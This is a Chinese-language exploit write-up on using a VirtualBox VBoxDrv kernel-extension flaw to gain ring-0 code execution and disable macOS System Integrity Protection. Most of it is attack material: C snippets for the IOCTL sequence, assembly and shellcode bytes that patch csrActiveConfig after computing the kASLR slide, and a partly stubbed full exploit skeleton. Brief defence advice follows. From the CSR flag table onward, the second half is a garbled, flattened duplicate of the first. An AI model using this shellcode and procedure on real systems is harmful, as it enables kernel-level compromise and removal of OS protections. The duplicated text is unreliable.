VirtualBox kext漏洞利用：禁用MacOS SIP技术分析<\/h1>

1. 系统完整性保护(SIP)概述<\/h2>

系统完整性保护(System Integrity Protection, SIP)是OS X El Capitan及后续MacOS版本引入的安全机制，用于保护关键系统组件免受攻击，包括root用户。SIP通过以下方式实现保护：<\/p>

限制对系统目录的写入<\/li>
阻止动态库注入到系统进程<\/li>
保护内核扩展不被加载<\/li>

限制调试工具的使用<\/li> <\/ul>

2. VirtualBox驱动漏洞分析<\/h2>

2.1 漏洞背景<\/h3>

VirtualBox是Oracle旗下的开源虚拟化软件，安装后会加载以下内核扩展：<\/p>

org.virtualbox.kext.VBoxDrv (主驱动)<\/li>
org.virtualbox.kext.VBoxUSB<\/li>
org.virtualbox.kext.VBoxNetFlt<\/li>

org.virtualbox.kext.VBoxNetAdp<\/li> <\/ul>

其中VBoxDrv驱动存在漏洞，允许内核代码执行。<\/p>

2.2 漏洞位置<\/h3>

漏洞存在于VBoxDrv驱动的以下关键函数链中：<\/p>

VBoxDrvDarwinIOCtlSMAP<\/code>：禁用SMAP保护<\/li>
VBoxDrvDarwinIOCtl<\/code>：处理IOCTL请求<\/li>

supdrvIOCtlInnerUnrestricted<\/code>：处理无限制IOCTL<\/li>
<\/ol>
2.3 关键漏洞点<\/h3>

SMAP绕过<\/strong>：VBoxDrvDarwinIOCtlSMAP<\/code>函数在执行IOCTL前禁用SMAP(Supervisor Mode Access Prevention)<\/li>
无限制执行<\/strong>：通过\/dev\/vboxdrv<\/code>设备(需root权限)可调用特权IOCTL<\/li>
任意代码执行<\/strong>：SUP_IOCTL_LDR_LOAD<\/code>允许加载并执行用户提供的Ring-0代码<\/li>
<\/ul>
3. 漏洞利用步骤<\/h2>
3.1 准备工作<\/h3>

安装VirtualBox(5.2.16版本已验证)<\/li>
确认驱动加载：kextstat | grep org.virtualbox<\/code><\/li>
获取root权限(因需要使用\/dev\/vboxdrv<\/code>)<\/li>
<\/ol>
3.2 利用流程<\/h3>


建立IOService连接<\/strong><\/p>
io_connect_t conn =<\/span> open_service("org_virtualbox_SupDrv"<\/span>);
<\/span><\/span>\/\/ 使用magic cookie 0x64726962("drvb")
<\/span><\/span><\/span><\/span>IOServiceOpen(service, mach_task_self(), 0x64726962<\/span>, &<\/span>connect);
<\/span><\/span><\/code><\/pre><\/li>

打开字符设备<\/strong><\/p>
int<\/span> fd =<\/span> open("\/dev\/vboxdrv"<\/span>, O_RDWR);
<\/span><\/span><\/code><\/pre><\/li>

获取会话Cookie<\/strong><\/p>
SUPCOOKIE cookie;
<\/span><\/span>\/\/ 设置必要字段
<\/span><\/span><\/span><\/span>strcpy(cookie.u.In.szMagic, SUPCOOKIE_MAGIC);
<\/span><\/span>cookie.u.In.u32MinVersion =<\/span> 0x290001<\/span>;
<\/span><\/span>ioctl(fd, SUP_IOCTL_COOKIE, &<\/span>cookie);
<\/span><\/span><\/code><\/pre><\/li>

分配可执行内存<\/strong><\/p>
SUPLDROPEN ldropen;
<\/span><\/span>\/\/ 设置必要参数
<\/span><\/span><\/span><\/span>strcpy(ldropen.u.In.szName, "XPN"<\/span>);
<\/span><\/span>ioctl(fd, SUP_IOCTL_LDR_OPEN, &<\/span>ldropen);
<\/span><\/span><\/code><\/pre><\/li>

加载并执行Shellcode<\/strong><\/p>
SUPLDRLOAD *<\/span>ldr =<\/span> malloc(9999<\/span>);
<\/span><\/span>ldr-><\/span>u.In.pvImageBase =<\/span> ldropen.u.Out.pvImageBase;
<\/span><\/span>ldr-><\/span>u.In.pfnModuleInit =<\/span> ldropen.u.Out.pvImageBase; \/\/ 执行地址
<\/span><\/span><\/span><\/span>memcpy(ldr-><\/span>u.In.abImage, shellcode, sizeof<\/span>(shellcode));
<\/span><\/span>ioctl(fd, SUP_IOCTL_LDR_LOAD, ldr);
<\/span><\/span><\/code><\/pre><\/li>
<\/ol>
4. SIP禁用技术<\/h2>
4.1 SIP实现原理<\/h3>
SIP状态存储在boot_args<\/code>结构的csrActiveConfig<\/code>字段中，可通过以下路径访问：<\/p>
PE_state.bootArgs->csrActiveConfig
<\/code><\/pre>
4.2 CSR标志位<\/h3>



标志<\/th>
值<\/th>
描述<\/th>
<\/tr>
<\/thead>


CSR_ALLOW_UNTRUSTED_KEXTS<\/td>
1<<0<\/td>
允许加载未签名内核扩展<\/td>
<\/tr>

CSR_ALLOW_UNRESTRICTED_FS<\/td>
1<<1<\/td>
允许无限制文件系统访问<\/td>
<\/tr>

CSR_ALLOW_TASK_FOR_PID<\/td>
1<<2<\/td>
允许task_for_pid调用<\/td>
<\/tr>

CSR_ALLOW_KERNEL_DEBUGGER<\/td>
1<<3<\/td>
允许内核调试<\/td>
<\/tr>

CSR_ALLOW_APPLE_INTERNAL<\/td>
1<<4<\/td>
允许Apple内部功能<\/td>
<\/tr>

CSR_ALLOW_UNRESTRICTED_DTRACE<\/td>
1<<5<\/td>
允许无限制DTrace<\/td>
<\/tr>

CSR_ALLOW_UNRESTRICTED_NVRAM<\/td>
1<<6<\/td>
允许无限制NVRAM访问<\/td>
<\/tr>

CSR_ALLOW_DEVICE_CONFIGURATION<\/td>
1<<7<\/td>
允许设备配置<\/td>
<\/tr>
<\/tbody>
<\/table>
4.3 Shellcode编写<\/h3>
示例Shellcode(10.13.6内核)：<\/p>
push<\/span> rbx<\/span>
<\/span><\/span>mov<\/span> rax<\/span>, [rbp<\/span>]             ; 第一栈帧
<\/span><\/span><\/span><\/span>mov<\/span> rax<\/span>, [rax<\/span>]             ; 第二栈帧
<\/span><\/span><\/span><\/span>mov<\/span> rax<\/span>, [rax<\/span>]             ; 第三栈帧
<\/span><\/span><\/span><\/span>mov<\/span> rax<\/span>, [rax<\/span> +<\/span> 8<\/span>]         ; 内核地址
<\/span><\/span><\/span><\/span>mov<\/span> rbx<\/span>, 0xFFFFFF80004D6EB1<\/span> ; 基准地址
<\/span><\/span><\/span><\/span>sub<\/span> rax<\/span>, rbx<\/span>               ; 计算kASLR slide
<\/span><\/span><\/span><\/span>mov<\/span> rbx<\/span>, 0xFFFFFF8000C1D1A8<\/span> +<\/span> 0xA0<\/span> ; PE Boot + bootArgs
<\/span><\/span><\/span><\/span>add<\/span> rax<\/span>, rbx<\/span>
<\/span><\/span>mov<\/span> rax<\/span>, [rax<\/span>]
<\/span><\/span>mov<\/span> byte<\/span> [rax<\/span> +<\/span> 0x498<\/span>], 0x67<\/span> ; 设置csrActiveConfig
<\/span><\/span><\/span><\/span>mov<\/span> rax<\/span>, 2<\/span>
<\/span><\/span>pop<\/span> rbx<\/span>
<\/span><\/span>ret<\/span>
<\/span><\/span><\/code><\/pre>5. 完整利用代码示例<\/h2>
#include<\/span> <stdio.h><\/span>
<\/span><\/span><\/span>#include<\/span> <stdlib.h><\/span>
<\/span><\/span><\/span>#include<\/span> <string.h><\/span>
<\/span><\/span><\/span>#include<\/span> <unistd.h><\/span>
<\/span><\/span><\/span>#include<\/span> <fcntl.h><\/span>
<\/span><\/span><\/span>#include<\/span> <sys\/ioctl.h><\/span>
<\/span><\/span><\/span>#include<\/span> <IOKit\/IOKitLib.h><\/span>
<\/span><\/span><\/span><\/span>
<\/span><\/span>\/\/ Shellcode示例
<\/span><\/span><\/span><\/span>char<\/span> shellcode[] =<\/span> "<\/span>\x53\x48\x8b\x45\x00\x48\x8b\x00\x48\x8b\x00\x48\x8b\x40\x08\x48\xbb\xb1\x6e\x4d\x00\x80\xff\xff\xff\x48\x29\xd8\x48\xbb\x48\xd2\xc1\x00\x80\xff\xff\xff\x48\x01\xd8\x48\x8b\x00\xc6\x80\x98\x04\x00\x00\x67\x48\xc7\xc0\x02\x00\x00\x00\x5b\xc3<\/span>"<\/span>;
<\/span><\/span>
<\/span><\/span>typedef<\/span> struct<\/span> {
<\/span><\/span>    uint32_t<\/span> u32Cookie;
<\/span><\/span>    uint32_t<\/span> u32SessionCookie;
<\/span><\/span>    uint32_t<\/span> cbIn;
<\/span><\/span>    uint32_t<\/span> cbOut;
<\/span><\/span>    uint32_t<\/span> fFlags;
<\/span><\/span>    uint32_t<\/span> rc;
<\/span><\/span>} SUPREQHDR;
<\/span><\/span>
<\/span><\/span>typedef<\/span> struct<\/span> {
<\/span><\/span>    SUPREQHDR Hdr;
<\/span><\/span>    union<\/span> {
<\/span><\/span>        struct<\/span> {
<\/span><\/span>            uint32_t<\/span> u32ReqVersion;
<\/span><\/span>            char<\/span> szMagic[32<\/span>];
<\/span><\/span>            uint32_t<\/span> u32MinVersion;
<\/span><\/span>        } In;
<\/span><\/span>        struct<\/span> {
<\/span><\/span>            uint32_t<\/span> u32SessionCookie;
<\/span><\/span>            uint32_t<\/span> u32Cookie;
<\/span><\/span>        } Out;
<\/span><\/span>    } u;
<\/span><\/span>} SUPCOOKIE;
<\/span><\/span>
<\/span><\/span>\/\/ 其他结构体定义...
<\/span><\/span><\/span><\/span>
<\/span><\/span>io_connect_t open_service<\/span>(const<\/span> char<\/span> *<\/span>name) {
<\/span><\/span>    \/\/ 实现IOService连接
<\/span><\/span><\/span><\/span>}
<\/span><\/span>
<\/span><\/span>int<\/span> main<\/span>() {
<\/span><\/span>    \/\/ 完整利用代码实现
<\/span><\/span><\/span><\/span>    \/\/ 包括上述所有步骤
<\/span><\/span><\/span><\/span>    return<\/span> 0<\/span>;
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>6. 防御措施<\/h2>

更新VirtualBox<\/strong>：Oracle已在新版本中修复此漏洞<\/li>
限制驱动加载<\/strong>：使用kextutil<\/code>限制第三方内核扩展<\/li>
SIP保持启用<\/strong>：非必要不修改SIP设置<\/li>
监控\/dev\/vboxdrv<\/strong>：检测异常访问行为<\/li>
使用系统完整性监控工具<\/strong>：如Endpoint Security框架<\/li>
<\/ol>
7. 总结<\/h2>
本文详细分析了如何通过VirtualBox内核扩展漏洞实现MacOS SIP的禁用。关键在于：<\/p>

利用VirtualBox驱动的IOCTL处理漏洞<\/li>
绕过SMAP保护实现内核代码执行<\/li>
定位并修改csrActiveConfig<\/code>值<\/li>
<\/ol>
此技术展示了即使有SIP保护，通过第三方驱动漏洞仍可能实现内核级权限提升，强调了系统组件安全审计的重要性。<\/p>

标志<\/th>	值<\/th>	描述<\/th> <\/tr> <\/thead>
CSR_ALLOW_UNTRUSTED_KEXTS<\/td>	1<<0<\/td>	允许加载未签名内核扩展<\/td> <\/tr>
CSR_ALLOW_UNRESTRICTED_FS<\/td>	1<<1<\/td>	允许无限制文件系统访问<\/td> <\/tr>
CSR_ALLOW_TASK_FOR_PID<\/td>	1<<2<\/td>	允许task_for_pid调用<\/td> <\/tr>
CSR_ALLOW_KERNEL_DEBUGGER<\/td>	1<<3<\/td>	允许内核调试<\/td> <\/tr>
CSR_ALLOW_APPLE_INTERNAL<\/td>	1<<4<\/td>	允许Apple内部功能<\/td> <\/tr>
CSR_ALLOW_UNRESTRICTED_DTRACE<\/td>	1<<5<\/td>	允许无限制DTrace<\/td> <\/tr>
CSR_ALLOW_UNRESTRICTED_NVRAM<\/td>	1<<6<\/td>	允许无限制NVRAM访问<\/td> <\/tr>
CSR_ALLOW_DEVICE_CONFIGURATION<\/td>	1<<7<\/td>	允许设备配置<\/td> <\/tr> <\/tbody> <\/table> 4.3 Shellcode编写<\/h3> 示例Shellcode(10.13.6内核)：<\/p> push<\/span> rbx<\/span> <\/span><\/span>mov<\/span> rax<\/span>, [rbp<\/span>] ; 第一栈帧 <\/span><\/span><\/span><\/span>mov<\/span> rax<\/span>, [rax<\/span>] ; 第二栈帧 <\/span><\/span><\/span><\/span>mov<\/span> rax<\/span>, [rax<\/span>] ; 第三栈帧 <\/span><\/span><\/span><\/span>mov<\/span> rax<\/span>, [rax<\/span> +<\/span> 8<\/span>] ; 内核地址 <\/span><\/span><\/span><\/span>mov<\/span> rbx<\/span>, 0xFFFFFF80004D6EB1<\/span> ; 基准地址 <\/span><\/span><\/span><\/span>sub<\/span> rax<\/span>, rbx<\/span> ; 计算kASLR slide <\/span><\/span><\/span><\/span>mov<\/span> rbx<\/span>, 0xFFFFFF8000C1D1A8<\/span> +<\/span> 0xA0<\/span> ; PE Boot + bootArgs <\/span><\/span><\/span><\/span>add<\/span> rax<\/span>, rbx<\/span> <\/span><\/span>mov<\/span> rax<\/span>, [rax<\/span>] <\/span><\/span>mov<\/span> byte<\/span> [rax<\/span> +<\/span> 0x498<\/span>], 0x67<\/span> ; 设置csrActiveConfig <\/span><\/span><\/span><\/span>mov<\/span> rax<\/span>, 2<\/span> <\/span><\/span>pop<\/span> rbx<\/span> <\/span><\/span>ret<\/span> <\/span><\/span><\/code><\/pre>5. 完整利用代码示例<\/h2> #include<\/span> <stdio.h><\/span> <\/span><\/span><\/span>#include<\/span> <stdlib.h><\/span> <\/span><\/span><\/span>#include<\/span> <string.h><\/span> <\/span><\/span><\/span>#include<\/span> <unistd.h><\/span> <\/span><\/span><\/span>#include<\/span> <fcntl.h><\/span> <\/span><\/span><\/span>#include<\/span> <sys\/ioctl.h><\/span> <\/span><\/span><\/span>#include<\/span> <IOKit\/IOKitLib.h><\/span> <\/span><\/span><\/span><\/span> <\/span><\/span>\/\/ Shellcode示例 <\/span><\/span><\/span><\/span>char<\/span> shellcode[] =<\/span> "<\/span>\x53\x48\x8b\x45\x00\x48\x8b\x00\x48\x8b\x00\x48\x8b\x40\x08\x48\xbb\xb1\x6e\x4d\x00\x80\xff\xff\xff\x48\x29\xd8\x48\xbb\x48\xd2\xc1\x00\x80\xff\xff\xff\x48\x01\xd8\x48\x8b\x00\xc6\x80\x98\x04\x00\x00\x67\x48\xc7\xc0\x02\x00\x00\x00\x5b\xc3<\/span>"<\/span>; <\/span><\/span> <\/span><\/span>typedef<\/span> struct<\/span> { <\/span><\/span> uint32_t<\/span> u32Cookie; <\/span><\/span> uint32_t<\/span> u32SessionCookie; <\/span><\/span> uint32_t<\/span> cbIn; <\/span><\/span> uint32_t<\/span> cbOut; <\/span><\/span> uint32_t<\/span> fFlags; <\/span><\/span> uint32_t<\/span> rc; <\/span><\/span>} SUPREQHDR; <\/span><\/span> <\/span><\/span>typedef<\/span> struct<\/span> { <\/span><\/span> SUPREQHDR Hdr; <\/span><\/span> union<\/span> { <\/span><\/span> struct<\/span> { <\/span><\/span> uint32_t<\/span> u32ReqVersion; <\/span><\/span> char<\/span> szMagic[32<\/span>]; <\/span><\/span> uint32_t<\/span> u32MinVersion; <\/span><\/span> } In; <\/span><\/span> struct<\/span> { <\/span><\/span> uint32_t<\/span> u32SessionCookie; <\/span><\/span> uint32_t<\/span> u32Cookie; <\/span><\/span> } Out; <\/span><\/span> } u; <\/span><\/span>} SUPCOOKIE; <\/span><\/span> <\/span><\/span>\/\/ 其他结构体定义... <\/span><\/span><\/span><\/span> <\/span><\/span>io_connect_t open_service<\/span>(const<\/span> char<\/span> *<\/span>name) { <\/span><\/span> \/\/ 实现IOService连接 <\/span><\/span><\/span><\/span>} <\/span><\/span> <\/span><\/span>int<\/span> main<\/span>() { <\/span><\/span> \/\/ 完整利用代码实现 <\/span><\/span><\/span><\/span> \/\/ 包括上述所有步骤 <\/span><\/span><\/span><\/span> return<\/span> 0<\/span>; <\/span><\/span>} <\/span><\/span><\/code><\/pre>6. 防御措施<\/h2> 更新VirtualBox<\/strong>：Oracle已在新版本中修复此漏洞<\/li> 限制驱动加载<\/strong>：使用kextutil<\/code>限制第三方内核扩展<\/li> SIP保持启用<\/strong>：非必要不修改SIP设置<\/li> 监控\/dev\/vboxdrv<\/strong>：检测异常访问行为<\/li> 使用系统完整性监控工具<\/strong>：如Endpoint Security框架<\/li> <\/ol> 7. 总结<\/h2> 本文详细分析了如何通过VirtualBox内核扩展漏洞实现MacOS SIP的禁用。关键在于：<\/p> 利用VirtualBox驱动的IOCTL处理漏洞<\/li> 绕过SMAP保护实现内核代码执行<\/li> 定位并修改csrActiveConfig<\/code>值<\/li> <\/ol> 此技术展示了即使有SIP保护，通过第三方驱动漏洞仍可能实现内核级权限提升，强调了系统组件安全审计的重要性。<\/p>